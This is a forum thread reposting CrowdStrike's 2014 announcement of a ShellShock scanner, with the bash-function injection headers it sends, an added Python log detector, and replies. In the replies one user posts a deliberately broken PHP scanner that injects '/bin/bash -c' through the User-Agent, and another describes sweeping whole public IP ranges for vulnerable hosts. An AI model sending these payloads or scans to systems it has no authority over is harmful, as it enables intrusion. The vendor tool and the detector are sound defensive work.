Nytro, posted September 30, 2014

CrowdStrike ShellShock Scanner – New Community Tool
The Tool Box | 30 Sep 2014 | Dmitri Alperovitch

A large number of ShellShock online vulnerability scanners have been released since the bug disclosure on September 24. These tools can be great for scanning external web servers, however, just as we’ve seen with the Heartbleed scanners, there is a real unfilled need for a tool that can be easily used to scan for vulnerable internal systems, in addition to the external servers. While Unix gurus can fairly easily write scripts to accomplish this task, many prefer to have an easy to use Windows GUI tool to simplify the vulnerability assessment process. And so after once again having put Robin Keir, our toolbuilder extraordinaire, on the case, we are proud to announce CrowdStrike ShellShock Scanner as our latest free community tool.

As with our Heartbleed scanner, the tool can import a list of IP ranges or website URLs to scan. Multiple port ranges can be selected and the results can be saved in CSV, HTML, XML or text format.

Unfortunately network-based scanning for vulnerable ShellShock servers is nowhere as easy as identifying the Heartbleed servers since the triggering of execution of the bash shell is usually very specific to each application. Even to effectively scan HTTP servers, one needs to know the path to all of the CGI scripts that are dependent on bash and sometimes even the specific GET or POST parameters that need to be supplied to the script in order to trigger the vulnerability. We have preloaded the scanner with almost 400 common CGI paths that will be attempted during the full scan and have allowed the import of additional paths to test custom or less popular CGI applications.

The scanner works by sending an HTTP GET request to each pre-configured CGI path of the scanned target with the following headers:

    Cookie: () { :; }; echo -e "\r\n\r\n<random string>"
    Referer: () { :; }; echo -e "\r\n\r\n<random string>"
    User-Agent: CrowdStrike ShellShock Scanner/1.0
    Test: () { :; }; echo -e "\r\n\r\n<random string>"

When the CGI script launches bash with the supplied environment parameters, it should trigger the execution of the echo command on a vulnerable system. With most scripts, the random string in the output of the echo command will be sent back in the body of the HTTP response, allowing the scanner to detect it and deem the system vulnerable. We deliberately picked the innocuous echo command as the one to execute by the scanner so as to minimize the chance of the scan doing anything harmful to the vulnerable target.

Please note that even a full internal and external IP range scan of your network will not provide you with a complete assurance that you are not vulnerable to ShellShock. In addition to the limitations of scanning CGI applications, this scanner is not able to determine the vulnerability of SMTP servers or DHCP clients to the bug. Nor is it able to be used to test for privilege escalation vulnerabilities via SSH or on local Unix and OSX systems. It is still paramount that you apply patches across your entire population of systems that utilize bash shell as soon as possible.

You can download CrowdStrike ShellShock Scanner here.

Source: CrowdStrike ShellShock Scanner – New Community Tool | Adversary Manifesto
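
The probe headers described in the article leave a recognisable trace in web server logs. The following Python script is an added example (not part of the original post and not CrowdStrike's code) that flags access-log lines whose Referer or User-Agent starts with a bash function definition. It assumes Apache's "combined" log format, which does not record the Cookie or Test headers; the sample lines and function names are constructed for illustration.

```python
import re

# Apache "combined" log format (assumed):
#   host ident user [time] "request" status bytes "referer" "user-agent"
# Apache backslash-escapes quotes inside logged header values.
_Q = r'"((?:[^"\\]|\\.)*)"'
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] ' + _Q + r' (\d{3}) \S+ ' + _Q + r' ' + _Q + r'\s*$'
)
# Header value that starts like a bash function definition, e.g. "() { :; };".
# Optional whitespace is tolerated so slight variations still match.
FUNC_DEF_RE = re.compile(r'^\s*\(\)\s*\{')
SCANNER_UA = "CrowdStrike ShellShock Scanner/1.0"  # User-Agent named in the article

# Constructed sample lines (documentation addresses, made-up paths).
SAMPLE_LOG = [
    r'192.0.2.10 - - [30/Sep/2014:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "http://example.test/" "Mozilla/5.0 (X11; Linux)"',
    r'192.0.2.20 - - [30/Sep/2014:10:00:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 87 "() { :; }; echo -e \"\\r\\n\\r\\nCONSTRUCTED\"" "CrowdStrike ShellShock Scanner/1.0"',
    r'192.0.2.30 - - [30/Sep/2014:10:00:03 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "-" "() { :;}; /bin/bash -c \"ls\""',
]

def classify(line):
    """Return a finding dict if a logged header looks like a probe, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None  # not a combined-format line
    host, request, status, referer, agent = m.groups()
    fields = [name for name, value in (("referer", referer), ("user-agent", agent))
              if FUNC_DEF_RE.match(value)]
    if not fields:
        return None
    parts = request.split()
    return {
        "host": host,
        "path": parts[1] if len(parts) > 1 else request,
        "status": int(status),
        "fields": fields,
        "known_scanner": agent == SCANNER_UA,
    }

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit only shows that a probe was received; whether the host is vulnerable still depends on the installed bash version, so findings are a prompt to verify patch status on the requested CGI path's server.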

Dragos (Moderators), posted September 30, 2014

This is for script kiddies. If I were the developer, I would have also put a bitcoin mining script in the application, since if the kids are downloading it anyway, I might as well make an honest buck.

It can be done faster like this, from the console.

    <?php
    $situri = array("http://site.ro/","http://site2.ro");
    foreach($situri as $sit){
        if(scaneaza($sit)) echo $sit . "\n";
    }
    function scaneaza($url){
        $cmd = "ls";
        $context = stream_context_create(
            array(
                'http' => array(
                    'method' => 'GET',
                    'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
                )
            )
        if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0) return 1;
        else return 0;
    }
    ?>

Gotyc, posted October 2, 2014

> It can be done faster like this, from the console.
>
>     <?php
>     $situri = array("http://site.ro/","http://site2.ro");
>     foreach($situri as $sit){
>         if(scaneaza($sit)) echo $sit . "\n";
>     }
>     function scaneaza($url){
>         $cmd = "ls";
>         $context = stream_context_create(
>             array(
>                 'http' => array(
>                     'method' => 'GET',
>                     'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
>                 )
>             )
>         if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0) return 1;
>         else return 0;
>     }
>     ?>

You left out about 2 )) at $context = ))); at the end :))

Dragos (Moderators), posted October 2, 2014

> You left out about 2 )) at $context = ))); at the end :))

They're intentional.

florinul, posted October 4, 2014

I tried it on the 66.33 range; it didn't find a single vulnerable one, or it isn't working properly. I'm going to try on 66.*

Aerosol, posted October 5, 2014

> What exactly is this application for?

If you're hanging around here out of boredom anyway (because you're more than clueless), use Google / Google Translate. Is it really that hard? For fuck's sake, you have 21 posts and they are extremely stupid...

florinul, posted October 9, 2014

I found a few that show up as vulnerable, but it doesn't show the CGI, it only shows the IP. I don't know what to say...